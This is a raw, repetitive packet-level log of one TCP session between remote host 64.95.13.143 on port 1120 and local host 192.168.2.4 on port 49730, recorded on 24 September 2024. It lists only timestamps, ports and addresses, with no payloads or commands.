Sep 24, 2024 17:46:11.761219025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761229992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761235952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761241913 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761253119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761257887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761265039 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.761267900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761275053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761286020 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761291027 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761295080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.761332035 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.761984110 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.761990070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762001038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762006998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762012005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762023926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762029886 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762034893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762039900 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762042046 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.762044907 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762056112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762058973 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.762062073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762072086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762078047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762088060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762089968 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.762244940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.762244940 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.762831926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762839079 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762850046 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762856007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762860060 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.762897015 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.819164038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819195032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819201946 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819281101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.819561005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819566965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819577932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819583893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.819617033 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.846180916 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846201897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846209049 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846219063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846225023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846235991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846241951 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.846375942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.846375942 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.846436977 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.848948002 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849067926 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849073887 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849078894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849117994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849191904 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849198103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849209070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849215031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849241972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849260092 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849412918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849419117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849431038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849466085 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849508047 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849514961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849526882 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849533081 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849538088 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849550009 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.849560022 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.849575996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.850287914 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850294113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850308895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850313902 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850326061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850332022 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850342035 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.850347996 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.850378990 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.851186991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851193905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851198912 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851210117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851212978 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851222038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851226091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851232052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851233959 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851234913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.851236105 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.851255894 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.851273060 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.852149963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852157116 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852168083 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852173090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852178097 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852184057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852195024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852200031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852205992 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852206945 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.852211952 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.852225065 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.852246046 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.853224993 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853230953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853241920 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853246927 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853251934 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853262901 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853267908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853272915 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853282928 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853287935 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853290081 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.853293896 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.853321075 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.854063034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854068995 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854079962 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854084969 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854089975 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854094982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854105949 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854110956 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854114056 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.854115963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854121923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854135990 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854140997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854142904 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.854150057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854155064 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.854161024 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.854195118 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.855091095 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855098963 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855101109 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855104923 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855108023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855113983 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855119944 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855124950 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855130911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855135918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855146885 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855151892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855151892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.855159998 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855171919 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855171919 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.855187893 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.855933905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855941057 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855952024 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855957031 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855962038 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855967999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855978012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855983019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855988026 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.855997086 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.855998039 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856004953 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856017113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856021881 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856028080 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.856031895 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856040001 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.856053114 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.856065989 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.911817074 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911827087 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911839008 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911900997 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911906958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911912918 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911920071 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.911933899 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.911981106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.912147999 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.912224054 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.940979958 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.940992117 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941061020 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.941102982 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941270113 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941282034 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941325903 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.941450119 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941461086 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.941497087 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.943991899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.943999052 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944047928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944128036 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944140911 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944185972 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944293976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944308043 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944323063 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944329023 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944348097 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944372892 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944547892 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944557905 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944569111 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944580078 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944598913 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944616079 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.944710970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.944859982 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945051908 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945230961 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945236921 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945251942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945260048 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945270061 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945275068 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945280075 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945308924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945308924 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945323944 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945738077 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945744991 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945755005 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945794106 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945919037 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945935965 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945946932 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945956945 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945962906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945976019 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.945977926 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.945981979 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946011066 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.946023941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.946760893 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946770906 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946782112 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946788073 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946794033 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946799040 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946810007 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946815014 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946820021 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946821928 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.946831942 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.946844101 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.946894884 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.947699070 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947714090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947762012 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.947870970 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947881937 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947889090 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947906017 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947917938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947923899 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947936058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947936058 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.947945118 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.947989941 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.948390961 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.948847055 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948858976 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948870897 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948878050 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948884964 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948890924 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948895931 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948900938 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948906898 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948906898 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.948920012 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.948929071 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.948951006 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.948964119 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.949609041 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949616909 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949631929 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949661016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.949812889 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949822903 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949834108 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949839115 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949845076 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949850082 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949860096 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949865103 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.949867964 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.949899912 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.949913979 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.949969053 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950047016 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.950488091 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950494051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950510025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950515032 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950525045 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950536966 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.950567007 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.950681925 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950694084 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950705051 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950710058 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950721025 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950727940 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.950736046 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.950757027 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.950767994 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951101065 CEST	1120	49730	64.95.13.143	192.168.2.4
Sep 24, 2024 17:46:11.951145887 CEST	49730	1120	192.168.2.4	64.95.13.143
Sep 24, 2024 17:46:11.951312065 CEST	1120	49730	64.95.13.143	192.168.2.4
